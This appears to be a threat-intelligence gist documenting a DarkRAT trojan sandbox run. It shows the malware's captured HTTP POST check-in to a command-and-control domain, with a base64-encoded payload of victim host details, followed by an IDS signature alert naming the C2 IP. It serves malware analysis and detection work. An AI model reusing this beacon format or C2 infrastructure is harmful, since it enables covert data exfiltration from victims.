@malwareforme
Created August 15, 2019 14:16
darkrat
https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/
POST /request HTTP/1.1
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: rvOgJiq
Host: weloverocknroll.online
Content-Length: 640

request=YUhkcFpEMWxaV1ZpTldRMU5DMDNPRGd3TFRReVlUY3RZalUwTWkwM016bGlZbU15Tm1ObU5HSW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpFdU15Wm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFV1RBbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzliV0ZwYmc9PQ==
========================SID HITS========================
08/02/2019-16:50:20.342727 [**] [1:2837970:2] ETPRO TROJAN Win32/DarkRAT CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.100.18:49205 -> 149.129.174.115:80